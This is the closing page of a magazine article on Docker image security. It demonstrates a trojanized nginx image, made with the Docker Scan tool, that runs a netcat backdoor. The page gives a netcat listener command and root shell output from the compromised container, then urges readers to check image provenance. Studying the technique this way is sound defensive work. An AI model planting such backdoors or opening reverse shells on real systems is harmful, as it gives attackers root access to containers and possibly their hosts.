Docker image security analysis

Pedigree

Backdoor Access

Considering how well Docker Scan handled the Docker API and processed its commands, I'm certain the image is indeed running netcat in the background, which is providing remote shell access. Of course, you can check that properly by running your new image (image 35640fed495c is tagged as nginx:latest ) and firing up a new Nginx container:

$ docker run nginx:latest

By using netcat in the other direction, you connect the listening netcat instance within the container. You can refer back to the netcat article mentioned earlier [11] if you get stuck. Note that the command

$ nc -v -k -l XXX.XXX.XXX.XXX 2222

connects locally (not publicly, which is what the XXX.XXX.XXX.XXX IP address would provide under the trojanize command used earlier).

Table 1 spills the beans: You're logged in as root and have access the top level of the filesystem! For clarity, I include the commands I used; they run in a pseudo-shell of sorts that does not have the usual prompt. Frighteningly enough, however, such a shell runs all the system-level commands you'd need to hack a container and, potentially, its host.

Table 1

Filesystem Top Level

`ls /`
`bin`	`proc`
`boot`	`root`
`dev`	`run`
`etc`	`sbin`
`home`	`srv`
`lib`	`sys`
`lib64`	`tmp`
`media`	`usr`
`mnt`	`var`
`opt`

`whoami`	`ls -al /usr/share/nginx`
`root`	`total 12`
	`drwxr-xr-x 3 root root 4096 Feb 6 08:11 .`
	`drwxr-xr-x 1 root root 4096 Feb 18 13:37 ..`
	`drwxr-xr-x 2 root root 4096 Feb 6 08:11 html`

As you can imagine from the information in Table 1, you now truly own the container and indeed anything that it can do on the host. I will leave you to mull over the blast radius that might involve.

The End Is Nigh

With popular image registries now brimming with publicly accessible images, you can see why being able to determine the provenance of a container image is so critical to your security posture.

I've barely scratched the surface of the sophisticated Docker Scan tool, which I hope you will spend some time looking into. Once the Python environment is up and running, it's very slick and easy to use, with a number of features that are well worth investigating.

Infos

"Keeping Docker containers safe" by Chris Binnie, ADMIN , issue 37, 2017, pg. 46: http://www.admin-magazine.com/Archive/2017/37/Keeping-Docker-containers-safe
CVE website: https://cve.mitre.org
Docker Scan: https://github.com/cr0hn/dockerscan
Docker Scan on YouTube: https://www.youtube.com/watch?v=OwX1e4y4JMk&feature=youtu.be
"Troubleshooting Kubernetes and Docker with a SuperContainer" by Chris Binnie, ADMIN , issue 40, 2017, pg. 26, http://www.admin-magazine.com/Archive/2017/40/Troubleshooting-Kubernetes-and-Docker-with-a-SuperContainer
Dockerfile: https://github.com/nginxinc/docker-nginx/blob/baa050df601b5e798431a9db458e16f53b1031f6/mainline/stretch/Dockerfile
Installing Python 3.6.1: http://ubuntuhandbook.org/index.php/2017/07/install-python-3-6-1-in-ubuntu-16-04-lts/
Docker CE: https://docs.docker.com/install/linux/docker-ce/ubuntu/
YouTube reference for Docker Scan: https://www.youtube.com/watch?v=UvtBGIb3E3o&feature=youtu.be
Hardening Docker: https://www.linux.com/blog/learn/2017/8/hardening-docker-hosts-user-namespaces
"Netcat – The Admin's Best Friend" by Chris Binnie: http://www.admin-magazine.com/Articles/Netcat-The-Admin-s-Best-Friend

The Author

Chris Binnie's latest book, Linux Server Security: Hack and Defend, shows how hackers launch sophisticated attacks to compromise servers, steal data, and crack complex passwords, so you can learn how to defend against such attacks. In the book, he also shows you how to make your servers invisible, perform penetration testing, and mitigate unwelcome attacks. You can find out more about DevOps, DevSecOps, Containers, and Linux security on his website: https://www.devsecops.cc.

« Previous 1 2 3 4